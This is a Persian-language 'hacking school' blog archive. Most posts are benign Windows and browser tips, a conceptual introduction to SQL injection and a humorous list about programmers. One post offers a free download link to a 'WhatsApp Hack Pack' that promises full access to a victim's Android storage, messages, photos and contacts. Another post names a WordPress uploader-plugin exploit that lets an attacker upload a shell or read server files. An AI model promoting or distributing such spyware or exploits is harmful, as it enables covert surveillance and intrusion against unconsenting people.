آموزشگاه هک ، هک استار

آموزش هک از مبتدی تا پیشرفته توسط هک استار

آموزشگاه هک ، هک استار

آموزش هک از مبتدی تا پیشرفته توسط هک استار

بایگانی

۷۲ مطلب با موضوع «آموزش هک» ثبت شده است

تزریق sql چیست ؟

پنجشنبه, ۱۴ مرداد ۱۳۹۵، ۱۰:۲۱ ق.ظ

✅تزریق sql چیست ؟


مقدمه


بسیاری بر این باوراند که درمورد تزریق sql دارای اطلاعاتی هستند ، اما تمام آن چیزی که آنها در مورد آن شنیده اند ویا تجربه نموده اند ، نمونه هایی جزئی و کم اهمیت هستند. تزریق sql یکی از آسیب های مخرب و جدی برای یک تجارت است ، زیرا می تواند منجر به در معرض قرار گرفتن تمامی اطلاعات حساس ذخیره شده در پایگاه داده (دیتابیس) برنامه های کاربردی ، شامل اطلاعات مفیدی مانند نام های کاربری ، گذرواژه ها ، اسامی ، نشانی ها ، شماره تلفن ها و جزئیات کارت های اعتباری شود.


بنابراین تزریق sql دقیقا چیست ؟

تزریق sql ضعفی است که نتیجه ی دسترسی و نفوذ یک مهاجم به زبان کوئری ساختارمند sql است که یک برنامه کاربردی برای رسیدن به یک پایگاه داده back-end از طریق آن منتقل می شود . با داشتن توانایی نفوذ بر آنچه که به سمت پایگاه داده منتقل می شود ، مهاجم میتواند بر روی قابلیت های خود SQL کار کند و همچنین از قدرت و انعطاف پذیری پایگاه داده پشتیبان ، استفاده کند و سیستم عامل پایگاه داده را در دسترس خود قرار دهد.


تزریق SQL ضعفی نیست که منحصرا برنامه های کاربردی وب را تحت تاثیر قرار دهد. هر کدی که یک داده (ورودی ) را از یک منبع غیر قابل اطمینان ، پذیرفته و سپس از آن ورودی برای ایجاد گزاره های پویا SQL استفاده نماید میتواند آسیب پذیر باشد (مانند برنامه های کاربردی fast client در یک معماری / سرویس گیرنده / سرویس دهنده)


تزریق SQL احتمالا از هنگامیکه پایگاه های داده SQL برای نخستین بار به برنامه های کاربردی وب متصل شدند، وجود داشته است . با این حال Rain Forest Puppy افدام به کشف آن نمود و یا دست کم برای جلب توجه مردم به آن ، تلاش کرد. در روز کریسمس سال 1998 ، Rain Forest Puppy مقاله ای با عنوان آسیب پذیزی های فناوری وب NT برای مجله Phrack نوشت (یک مجله الکترونیکی نوشته شده توسط او برای هکرها). او همچنین متنی در مورد تزریق SQL در اوایل سال 2000 منتشر نمود (چگونه Packet Storm را هک کردم )، که در آن به تفضیل در مورد چگونگی استفاده از تزریق SQL برای لطمه زدن و تخریب یک وب سایت محبوب توضیح داده است . از آن زمان، محققان بسیاری ،روش هایی را برای بهره برداری وسوء استفاده از تزریق SQL توسعه و بهبود بخشیده اند . با این حال ، تا به امروز بسیاری از توسعه دهندگان و متخصصان امنیتی ، هنوز هم ماهیت آن را کاملا درک نکرده اند.

🌐با ما باشید....

  • محمدرضا سلیمی

ادغام فایل‌های MP3

پنجشنبه, ۱۴ مرداد ۱۳۹۵، ۱۰:۱۶ ق.ظ

طبیعتا اولین راهی که برای ادغام فایل‌های MP3 به ذهن شما خطور می‌کند، استفاده از نرم‌افزارهای جانبی
مانند MP3 Toolkit می‌باشد، اما جالب است بدانید که امکان انجام این عمل در خود ویندوز و تنها با استفاده از یک ترفند ساده فراهم شده است😮👌

⭕️ در پست امروز تصمیم داریم با معرفی یک ترفند ساده دو یا چند فایل MP3 را بدون استفاده از نرم‌افزار جانبی و تنها با استفاده از خط فرمان ویندوز ادغام کنیم😉

✅ بدین منظور:

1⃣ ابتدا یک فولدر خالی ایجاد نمایید.

2⃣ فایل‌های MP3 که قصد دارید با هم ادغام شوند را درون پوشه‌ای که ساختید کپی کنید.

3⃣ برای اینکه ترتیپ پخش
فایل‌های MP3 را مشخص کنید، نام آنها را به ترتیب ۱ و ۲ و ... بگذارید.

4⃣ اکنون دکمه Shift را از روی صفحه کلید پایین نگه داشته و روی پوشه‌ای که ساختید راست کلیک کرده و گزینه‌ی

Open command window here

را انتخاب نمایید تا خط فرمان ویندوز برای شما اجرا شود.

5⃣ در خط فرمان دستور زیر را وارد کرده و اینتر بزنید.

copy /b *.mp3
Kali.mp3


😋 اکنون فایل خروجی (ادغام شده) با نامkali.mp3 در پوشه‌ای که ساخته‌اید آماده استفاده می‌باشد

  • محمدرضا سلیمی

با آموزش دانلود مستقیم از یوتیوب در خدمتتون هستیم ... (روشی فیلترنشدنی )
چنین آموزش هایی با چنین نامی شاید زیاد دیده باشید هم در این کانال و هم در پیج و کانال پگاه
ولی اینبار این دانلود توسط ربات تلگرام انجام میشه
نمیدونم خبر دارید یا نه ولی مبحث دانلود از یوتیوب رو میخوام ببندم و مشکلی برای دانلودش نباشه

آموزش بسیار ساده ست
1- به ربات @SaveVideoBot پیام بدید ( /start کنید )

2- خب نیاز دیگر به هیچ کدی نیست ... لینک یوتیوب مورد نظرتون رو کپی کنید برای ربات بفرستید
3- در کمتر از 5 ثانیه لینک دانلود + توضیحاتش رو براتون میفرسته

خب تمام کافیه فایل موردنظر رو بصورت مستقیم از سرور تلگرام دانلود کنید ...
این آموزش صرفا جهت آگاهی کاربرانی که درخواست دانلود از یوتیوب بدون مشکل رو داشتند قرار گرفته شده و ان شالله به زودی با آموزش های دیگر در خدمت کاربران هستیم
(برای تست میتونید لینک زیر رو برای ربات ارسال کنید )

https://www.youtube.com/watch?v=JByDbPn6A1o
لینک های دیگر هم به همین صورت
➖➖➖➖➖➖➖➖➖➖➖➖

  • محمدرضا سلیمی

مشاهده اطلاعات سخت‌افزاری به شکل نرم‌افزاری

چهارشنبه, ۱۳ مرداد ۱۳۹۵، ۱۱:۳۳ ب.ظ

☑️ مشاهده اطلاعات سخت‌افزاری به شکل نرم‌افزاری
〰〰〰〰〰〰〰〰〰〰〰〰
شاید شما نیز علاقه‌مند باشید تا به ریز اطلاعات سخت‌افزاری سیستم‌تان به شکل دقیق پی ببرید. برای این کار چه می‌کنید؟ کیس را باز می‌کنید و از روی قطعات به اطلاعات مورد نیاز پی می‌برید؟ دست نگه‌دارید! با ترفندی ساده با استفاده از ابزار مخفی ویندوز می‌توانید به اطلاعات کامل سخت‌افزاری سیستم خود پی ببرید.

🌀برای این کار:

با فشردن کلیدهای Win+R وارد Run شوید.
اکنون عبارت DXDIAG را وارد نموده و Enter بزنید.
اگر از شما سوالی هم شد Yes بزنید.
در پنجره باز شده اطلاعات کاملی از جزئیات سخت‌افزاری سیستم‌تان خواهید داشت.

➖➖➖➖➖➖➖➖➖➖➖➖

  • محمدرضا سلیمی

اکسپلویت

چهارشنبه, ۱۳ مرداد ۱۳۹۵، ۱۱:۳۲ ب.ظ

✅اکسپلویت

اکسپلویت Wordpress Plugi Advanced uploader v2.10
نفوذگر با بهره برداری از این آسیب پذیری می تواند فایل مخرب یا شل خود را بروی سرور آپلود کند و یا فایل های محلی سرور را مشاهده کند.

‼️این باگ در نسخه های جدید وردپرس رفع شده است.

  • محمدرضا سلیمی

ترفند استفاده از تلگرام بر روی مرورگر فایرفاکس

چهارشنبه, ۱۳ مرداد ۱۳۹۵، ۱۱:۳۰ ب.ظ

👇ترفند استفاده از تلگرام بر روی مرورگر فایرفاکس ?👇

✅ بدین منظور:

⭕️ ابتدا به لینک زیر مراجعه کنید:

http://tinyurl.com/j5ncon3

⭕️ سپس در صفحه باز شده بر روی
گزینه Add to Firefox کلیک کرده و افزونه را نصب کنید.

⭕️ پس از نصب افزونه، آیکن تلگرام به نوار ابزار مرورگر شما اضافه می شود✌️

✅ حال می توانید روی آیکن تلگرام کلیک کرده و با وارد کردن شماره و سپس کد فعالسازی، وارد تلگرام شوید👌😋

  • محمدرضا سلیمی

چگونه یک برنامه نویس رو بشناسیم

چهارشنبه, ۱۳ مرداد ۱۳۹۵، ۱۱:۲۹ ب.ظ

✅چگونه یک برنامه نویس رو بشناسیم

1– به نور خورشید حساسیت دارد 😑☀️

برنامه نویس جماعت کلا به نور خورشید حساسیت دارند و اصلا نمی توانند در زیر نور خورشید به بازی و یا راه رفتند بپردازند. اگر روزی با برنامه نویسی رفتید به پارک و مشاهده کردید که نمی تواند در زیر نور خورشید بایستد او را ملامت نکنید چونکه او به نور خورشید عادت ندارد.

2- گاهی دارای حالات روحی نامتعادل می باشد☹️

3- بدنش قدرت دفاعی ندارد😷

همانطور که مستحضر می باشید انسان دارای یک سیستم دفاعی می باشد که بدن را در مقابل ویروس ها و … محافظت می کند؛ ولی برنامه نویس از این قاعده مستثنی می باشد و اکثر مواقع مریض می باشد. شما همیشه شاهد این هستید که در طول ۳۶۵ روز یک سال برنامه نویس دماغش را بالا می کشد. همیشه در موقع بیدار شدن از خواب احساس گلو درد دارد. خلاصه ویروس ها علاوه بر اینکه در کامپیوتر ها هستند در بدن برنامه نویس ها هم جولان می دهند.

4- هیچ مهارتی در زمینه زندگی واقعی ندارند😐

یک برنامه نویس واقعی عمرا بتواند روغن موتور یک ماشین را عوض کند و یا یک برنامه نویس واقعی عمرا بتواند برای یک وعده خود غذا تهیه کند (البته به غیر از نیمرو یا خانواده نیمرو و یا همبرگر ).

5- اجتماعی بودن در حد صفر – کامپیوتر » بشر🙂🖥

این مورد بهترین نشانه برای شناسایی یک برنامه نویس واقعی است. برنامه نویس رفت و آمد نمی کنه، به مجالس ترحیم و عروسی نمی رود، به جای تلفن از ایمیل استفاده می کند، دوست دختری ندارد، در سایت های فیس بوک و امثال الهم فعالیت ندارد، کلا در مجامع گوشه گیر است و … . اصلا او یک فرد اجتماعی نمی باشد. او را می توان هم تراز مرتاض های هندی که تارک دنیا هستند دانست.

6- احساس می کند باهوش تر از دیگران هست🤔

برنامه نویس همیشه فکر می کند بسیار باهوش تر از دیگران است و احساس برتری به دیگران دارد. بدلیل اینکه دیگران نمی دانند Delegate چیست؟ و یا دیگران نمی دانند که تریگر چیست و … . البته در بسیاری از موارد مشاهده شده است که این حس کاذب می باشد.

7- مد و ظاهر = NULL 😶

این مورد هم باعث شناخته شدن برنامه نویس ها می شود. برنامه نویس معمولا سر خود را شانه نمی کند و معمولا دارای سری نامرتب می باشد. از لحاظ لباس هم در ساده ترین حالت می باشد.

8- چشم های پف کرده 😮

این مورد هم که به دلیل استفاده ۱۸ ساعته در هر روز از کامپیوتر می باشد.


⚠️ نکته آخر : اگر شما هم برنامه می نویسید یعنی کد تایپ می کنید، ولی لزوما این نشانگر این نیست که شما یک برنامه نویس می باشید. برنامه نویس بودن به همین سادگی ها که فکر می کنید هم نیست. علاوه بر این که شما باید مسلط به زبان های برنامه نویسی باشید، باید دارای این ۹ نشانه هم باشید.

🌐باماباشید....

🌀وب رو به دوستاتون معرفی کنید

  • محمدرضا سلیمی

هک تمام اطلاعات گوشی

چهارشنبه, ۱۳ مرداد ۱۳۹۵، ۱۱:۲۸ ب.ظ

پست درخواستی :

هک تمام اطلاعات گوشی

این مجموعه که ما رایگان در اختیار شما قرار دادیم در پیجی دیگر بالای 29 هزار تومان فروخته میشود

* با این ابزار چیکار میتونم بکنم؟؟؟
با این ابزار به کل حافظه داخلی و خارجی دستگاه اندرویدی قربانی تسلط پیدا میکنید ،نیاز به توضیح نیست که دسترسی به SD card یعنی دسترسی به تمام عکس ها،فیلم ها،پیام های واتس اپ،sms ها،دفترچه تلفن و...‌‌‌..‌


*کار کردن باهاش سخته؟؟؟

برای تمام ابزار ،فیلم آموزشی تهیه شده.طبق فیلم پیش برید سخت نیست.

*برای ویندوز


لینک دانلود:
http://uplod.ir/a3giv4z2j5wd/WhatsApp_Hack_Pack_&_android.rar.htm

➖➖➖➖➖➖➖➖➖➖➖➖

  • محمدرضا سلیمی

حل مشکل فایرفاکس

چهارشنبه, ۱۳ مرداد ۱۳۹۵، ۱۱:۲۶ ب.ظ

⭕️ در صورتی که با مرورگر فایرفاکس زیاد سروکار دارید،‌ حتماً‌ به این مشکل برخورده‌اید که هنگامی که قصد دارید تا آدرس سایتی را در نوار آدرس مرورگر وارد کنید به این دلیل که از قبل زبان صفحه کلید ویندوز بر روی فارسی قرار گرفته است،‌ آدرس سایت اشتباهاً به زبان فارسی تایپ می‌شود 😐 و ناچارید عبارت اشتباه را پاک نموده، زبان صفحه کلید را به انگلیسی تغیر دهید و مجدد آدرس صحیح را وارد کنید.

🤔 این مشکل چه برای کاربران حرفه ای که تند تایپ می‌کنند و چه برای کاربران مبتدی که به هنگام تایپ به صفحه کلید نگاه می‌کنند پیش می‌آید.

✅ برای حل این مشکل:

تنها نیازمند یک افزونه به نام

Input Language Assistant

هستیم. با نصب این افزونه بر روی مرورگر فایرفاکس، در صورتی که زبان صفحه کلید بر روی فارسی (یا هر زبانی به غیر انگلیسی) قرار گرفته باشد،‌ به طور اتوماتیک زبان به انگلیسی تغییر پیدا می‌کند و اشتباهی رخ نمی‌دهد😋✌️


✅ برای نصب این افزونه بر روی لینک زیر کلیک کنید:

https://addons.mozilla.org/en-us/firefox/addon/input-language-assistant

سپس با انتخاب

Add to Firefox

و سپس کلیک بر روی
دکمه Install،‌ افزونه را نصب کنید. پس از نصب افزونه نیاز است که یک بار فایرفاکس را ببندید و آن را مجددا باز کنید.

✅ حال اگر زبان را به فارسی تغییر دهید و سپس یک تب جدید باز کنید و در نوار آدرس تایپ کنید متوجه کارکرد افزونه خواهید شد.

➖➖➖➖➖➖➖➖➖➖➖➖➖

  • محمدرضا سلیمی

ترفند notepad

چهارشنبه, ۱۳ مرداد ۱۳۹۵، ۱۱:۲۵ ب.ظ

⭕️ در این پست به عنوان نمونه به شما نشان خواهیم داد که چگونه Notepad را در منوی کلیک ‌راست ویندوز قرار دهید🤔 اما شما ‌می‌توانید هر اپلیکیشن دلخواهی را که نیاز دارید به این منو اضافه کنید 😋👌

✅ اولین کاری که باید انجام دهید، باز کردن رجیستری ویندوز است.

✅ برای این کار عبارت regedit.exe را در منوی استارت تایپ کرده و کلید اینتر را بزنید.

✅ سپس در محیط رجیستری، مسیر زیر را پیدا کنید :

HKEY_CLASSES_ROOT\Directory\Background\shell

✅ در ادامه باید یک کلید (Key) رجیستری جدید ایجاد کنید. این کلید باید زیر مجموعه‌ی کلید shell باشد.

✅ بدین منظور بر روی
کلید shell راست کلیک کرده و از
بخش New گزینه‌ی Key را انتخاب نمایید.

✅ سپس نامی که ‌می‌خواهید اپلیکیشن‌تان با آن نام در منو نمایش داده شود را وارد کنید. برای مثال، در اینجا از نام Notepad استفاده ‌می‌کنیم.

✅ در ادامه‌ی کار، باید یک کلید فرمان ایجاد کنید که در واقع دستورات مربوط به اجرای اپلیکیشن را در خود نگهداری کند.

✅ بدین منظور بر روی کلید Notepad راست کلیک کرده و مانند قبل با انتخاب
گزینه‌ی Key، یک کلید جدید بسازید.

✅ نام این کلید را command قرار دهید.

⚠️ توجه کنید که این کلمه حتما باید با حروف کوچک نوشته شود.

✅ اکنون بر روی کلید command کلیک کرده و از سمت راست پنجره بر روی مقدار پیشفرض (Default) آن دابل کلیک کنید تا بتوانید مقدار رشته‌ی آن را تغییر دهید.

✅ پس از آن، مسیر کامل فایل اجرایی برنامه را در این قسمت وارد کنید. به عنوان مثال برای برنامه Notepad مسیر زیر را وارد‌‌ کنید:

C:\Windows\System32\notepad.exe

😋 کار تمام شد✌️ رجیستری را ببندید‌‌ و یکبار سیستم خود را ریست کنید.

💟 حال اگر بر روی دسکتاپ راست کلیک کنید، خواهید دید که یک گزینه‌ی جدید به منوی آن اضافه شده است که با استفاده از آن‌ می توانید Notepad را به سرعت اجرا کنید 😉👌

⭕️ به همین شکل‌ می‌توانید هر تعداد اپلیکیشنی که بخواهید، به منوی راست کلیک دسکتاپ اضافه کنید. فقط کافی است که همین مراحل را برای اپلیکیشن جدیدتان تکرار کنید 😋

  • محمدرضا سلیمی